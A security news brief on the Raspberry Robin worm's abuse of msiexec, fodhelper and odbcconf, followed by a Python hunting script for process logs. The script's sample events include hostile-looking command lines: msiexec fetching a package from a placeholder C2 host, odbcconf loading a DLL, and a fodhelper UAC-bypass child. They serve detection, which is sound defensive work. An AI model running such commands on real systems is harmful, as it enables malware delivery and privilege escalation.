Windows Installer leveraged to spread Raspberry Robin worm

BleepingComputer reports that various networks, including those of entities in the technology and manufacturing industries, have been impacted by the novel Raspberry Robin malware, which infects Windows systems through infected USB drives. Raspberry Robin exploits the Microsoft Standard Installer to communicate with command-and-control servers, a report from Red Canary revealed.

"While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware. Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes," said researchers.

The report added that a malicious DLL is being launched by Raspberry Robin along with the fodhelper and odbcconf utilities, with the former enabling User Account Control evasion and the latter allowing DLL configuration and execution.

However, questions remain about the activity of Raspberry Robin. "First and foremost, we don't know how or where Raspberry Robin infects external drives to perpetuate its activity, though it's likely this occurs offline or otherwise outside of our visibility. We also don't know why Raspberry Robin installs a malicious DLL. One hypothesis is that it may be an attempt to establish persistence on an infected system, though additional information is required to build confidence in that hypothesis," researchers added.
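The three behaviours the report calls out (msiexec.exe reaching out to a remote URL, odbcconf.exe being handed a DLL, and a child process launched under fodhelper.exe) are all visible in process-creation telemetry. The script below is an added example written for this page, not code from Red Canary, BleepingComputer or SC Media: it parses a simplified, constructed process-creation log format (the `parent=... image=... cmdline=...` layout and the sample lines are assumptions for the demo) and flags the three patterns so a defender can see what a hunt query over real Sysmon or EDR data would need to express.

```python
import re
from dataclasses import dataclass

# Constructed log format for the example: one process-creation event per line.
LINE_RE = re.compile(r'parent="([^"]*)" image="([^"]*)" cmdline="([^"]*)"')
URL_RE = re.compile(r"https?://", re.IGNORECASE)
DLL_ARG_RE = re.compile(r"\.(dll|rsp)\b", re.IGNORECASE)


@dataclass
class ProcEvent:
    parent: str
    image: str
    cmdline: str


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_event(line: str):
    """Parse one constructed log line into a ProcEvent, or None if it does not match."""
    m = LINE_RE.search(line)
    return ProcEvent(*m.groups()) if m else None


def flag_event(ev: ProcEvent) -> list:
    """Return the detection labels that apply to a single process-creation event."""
    image, parent = basename(ev.image), basename(ev.parent)
    findings = []
    # msiexec.exe normally installs local packages; a URL on its command line
    # means it is fetching (and possibly running) a package from the network.
    if image == "msiexec.exe" and URL_RE.search(ev.cmdline):
        findings.append("msiexec.exe fetching a package from a remote URL")
    # odbcconf.exe given a DLL or response file is the LOLBin DLL-loading pattern.
    if image == "odbcconf.exe" and DLL_ARG_RE.search(ev.cmdline):
        findings.append("odbcconf.exe loading a DLL / response file")
    # fodhelper.exe is an auto-elevating binary; it should not be spawning children.
    if parent == "fodhelper.exe":
        findings.append("child process spawned under fodhelper.exe (UAC bypass pattern)")
    return findings


def scan(lines) -> list:
    """Scan an iterable of log lines; return (image, findings) pairs for suspicious events."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        findings = flag_event(ev)
        if findings:
            hits.append((ev.image, findings))
    return hits


# Constructed sample telemetry (the domain is a placeholder, not a real IoC).
SAMPLE_EVENTS = [
    r'parent="C:\Windows\explorer.exe" image="C:\Windows\System32\notepad.exe" cmdline="notepad.exe"',
    r'parent="C:\Windows\explorer.exe" image="C:\Windows\System32\msiexec.exe" cmdline="msiexec.exe /i C:\Temp\setup.msi /qn"',
    r'parent="C:\Windows\System32\cmd.exe" image="C:\Windows\System32\msiexec.exe" cmdline="msiexec.exe /q /i http://placeholder-c2.invalid/pkg.msi"',
    r'parent="C:\Windows\System32\cmd.exe" image="C:\Windows\System32\odbcconf.exe" cmdline="odbcconf.exe /a {regsvr C:\ProgramData\update.dll}"',
    r'parent="C:\Windows\System32\fodhelper.exe" image="C:\Windows\System32\cmd.exe" cmdline="cmd.exe /c start something"',
]

if __name__ == "__main__":
    for image, findings in scan(SAMPLE_EVENTS):
        print(image, "->", "; ".join(findings))
```

The benign `msiexec.exe /i C:\Temp\setup.msi` line is deliberately included: a rule that fires on msiexec alone is far too noisy, so the URL on the command line is what separates the report's C2 pattern from routine software installs.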
